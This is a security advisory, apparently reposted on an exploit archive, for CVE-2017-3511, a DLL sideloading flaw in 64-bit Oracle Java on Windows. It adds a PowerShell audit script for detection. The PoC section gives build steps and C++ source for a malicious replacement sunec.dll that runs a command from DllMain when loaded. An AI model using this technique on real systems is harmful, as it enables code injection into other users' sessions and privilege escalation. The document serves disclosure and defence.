Oracle Java 64bit DLL Hijacking
Posted Apr 21, 2017
Authored by Florian Bogner

A code injection through DLL sideloading vulnerability exists in 64-bit Oracle Java.

tags | exploit, java
systems | windows
advisories | CVE-2017-3511
SHA-256 | 4f956101cdf5d276c874cea123fd4623f5a037012bdc72feb00042183a276e5d

Code Injection through DLL Sideloading in 64bit Oracle Java

Metadata
===================================================
Release Date: 19-March-2017
Author: Florian Bogner // https://bogner.sh
Affected product: 64bit Oracle Java on Windows (https://java.com/en/)
Fixed in: Java SE: 7u131, 8u121; Java SE Embedded: 8u121; JRockit: R28.3.13
Tested on: Windows 7 and Windows 2008R2
CVE: CVE-2017-3511
URL: https://bogner.sh/2017/04/cve-2017-3511-code-injection-through-dll-sideloading-in-64bit-oracle-java
Video: https://youtu.be/bEiC4JLrV_4
Vulnerability Status: Fixed in Oracle Critical Patch Update Advisory - April 2017

Product Description
===================================================
Java is a set of computer software and specifications developed by Sun Microsystems, which was later acquired by the Oracle Corporation, that provides a system for developing application software and deploying it in a cross-platform computing environment. Java is used in a wide variety of computing platforms from embedded devices and mobile phones to enterprise servers and supercomputers.
~https://en.wikipedia.org/wiki/Java_(software_platform)

Vulnerability Description
===================================================
Vulnerable 64-bit Oracle Java versions on Windows try to load some of their (crypto) dependencies from the non-existent folder C:\Program%20Files\Java\jre[version]\lib\ext. This is most likely caused by an encoding issue, as %20 is the URL-encoded form of a space. Because any local user is allowed to create new folders in the root of the C: drive, the Program%20Files folder can be created. Thereby, any local user can place a malicious DLL into C:\Program%20Files\Java\jre1.8.0_101\lib\ext.

Hence, code can be injected into other users' Windows sessions. Additionally, if a vulnerable Java application runs with elevated privileges (SYSTEM, local admin, domain admin), this issue can also be used to escalate one's permissions vertically.

Suggested Solution
===================================================
Update to the latest version.
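The following audit script is added here as an example and is not part of Florian Bogner's advisory. It assumes Windows PowerShell 5 or later on a 64-bit host; the rogue path, the drive-root permission that enables it, the Java folder layout and the fixed release numbers (7u131, 8u121) are taken from this advisory.

```powershell
# Added audit script, not part of the original advisory. Assumes Windows PowerShell 5+.
# Checks the conditions the advisory describes: a URL-encoded "Program%20Files" folder
# on the system drive, DLLs planted under its Java lib\ext path, and whether non-admin
# users may create folders at the drive root. Also flags JRE/JDK folders older than
# the fixed releases listed in the Metadata section (7u131 / 8u121).
$Drive = $env:SystemDrive            # normally "C:"
$Rogue = Join-Path $Drive 'Program%20Files'

# 1. Does the bogus folder exist, and does it hold DLLs under a Java lib\ext path?
if (Test-Path -LiteralPath $Rogue) {
    Write-Warning "Found URL-encoded directory: $Rogue"
    Get-ChildItem -LiteralPath $Rogue -Recurse -Filter *.dll -ErrorAction SilentlyContinue |
        Where-Object { $_.FullName -match '\\Java\\jre[^\\]*\\lib\\ext\\' } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            Write-Warning ("Planted DLL: {0} (signature: {1}, owner: {2})" -f
                $_.FullName, $sig.Status, (Get-Acl -LiteralPath $_.FullName).Owner)
        }
} else {
    Write-Output "OK: $Rogue does not exist"
}

# 2. Can unprivileged users create folders at the drive root? AppendData on a directory
#    means "Create folders"; Windows grants it to Authenticated Users there by default.
$AppendData = [System.Security.AccessControl.FileSystemRights]::AppendData
(Get-Acl -LiteralPath "$Drive\").Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -match 'Authenticated Users|BUILTIN\\Users|Everyone' -and
        (($_.FileSystemRights -band $AppendData) -ne 0)
    } |
    ForEach-Object { Write-Warning ("{0} may create folders in {1}\" -f $_.IdentityReference, $Drive) }

# 3. Which installed 64-bit JREs/JDKs predate the fix? Folder names look like "jre1.8.0_101".
function Test-JavaFixed([string]$Folder) {
    if ($Folder -match '^j(re|dk)1\.(\d)\.0_(\d+)$') {
        $update = [int]$Matches[3]
        switch ([int]$Matches[2]) {
            7 { return ($update -ge 131) }
            8 { return ($update -ge 121) }
        }
    }
    return $false   # any other layout or major: not covered by the advisory, review manually
}
Get-ChildItem -Directory -Path "$Drive\Program Files\Java" -ErrorAction SilentlyContinue |
    ForEach-Object {
        if (Test-JavaFixed $_.Name) { Write-Output "OK: $($_.Name) is at or above the fixed release" }
        else { Write-Warning "Vulnerable or unverified Java install: $($_.FullName)" }
    }
```

A finding in step 1 is an indicator that the sideloading path has been prepared or used and warrants forensic follow-up on the owner and creation time of the planted files; step 2 reports the default permission that makes the technique possible on an unpatched host.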

Disclosure Timeline
===================================================
8.8.2016: The issues have been documented and reported
10.8.2016: The issue has been confirmed by the vendor
6.12.2016: CVE-2017-3511 has been assigned
19.4.2017: Fix released in Oracle's Critical Patch Update April 2017

PoC
===================================================
1.) Build a "malicious" replacement for an affected DLL such as sunec.dll
2.) Create the folder structure C:\Program%20Files\Java\jre1.8.0_101\lib\ext and place the DLL in there.
3.) Start a vulnerable application (such as Burp or Angry IP Scanner)

The following source can be used to build the DLL:

#include <process.h>
#include <stdlib.h>   /* system(), exit() */

/*
Build as a 64-bit DLL from a Visual Studio command prompt:
"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" amd64
cl.exe /D_USRDLL /D_WINDLL sunec.cpp /link /DLL /OUT:sunec.dll
*/

/* Export all functions the JVM resolves from sunec.dll - use Dependency Walker to check what is needed. */
extern "C"
{
    __declspec(dllexport) int Java_sun_security_ec_ECDHKeyAgreement_deriveKey();
    __declspec(dllexport) int Java_sun_security_ec_ECDSASignature_signDigest();
    __declspec(dllexport) int Java_sun_security_ec_ECDSASignature_verifySignedDigest();
    __declspec(dllexport) int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair();
}

/*
DllMain is declared with plain C types (HINSTANCE -> void*, DWORD -> unsigned long,
LPVOID -> void*) so windows.h does not have to be included. The loader calls it as
soon as the JVM loads the DLL, before any of the exports above are used.
*/
extern "C" int __stdcall DllMain(void* hinst, unsigned long reason, void* reserved) {
    (void)hinst; (void)reason; (void)reserved;
    /* PoC payload: show a message box to prove the code ran, then terminate the host process. */
    system("powershell -Command \"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[System.Windows.Forms.MessageBox]::Show('DLL Loaded')\"");
    exit(1);
    return 0;
}

/* Stubs for the exports; they are never reached because DllMain exits first. */
int Java_sun_security_ec_ECDHKeyAgreement_deriveKey() {
    return 0;
}

int Java_sun_security_ec_ECDSASignature_signDigest() {
    return 0;
}

int Java_sun_security_ec_ECDSASignature_verifySignedDigest() {
    return 0;
}

int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair() {
    return 0;
}

Florian Bogner

eMail: florian@bogner.sh
Web: http://www.bogner.sh
LinkedIn: https://www.linkedin.com/profile/view?id=368904276
Xing: https://www.xing.com/profile/Florian_Bogner9
packet storm

© 2022 Packet Storm. All rights reserved.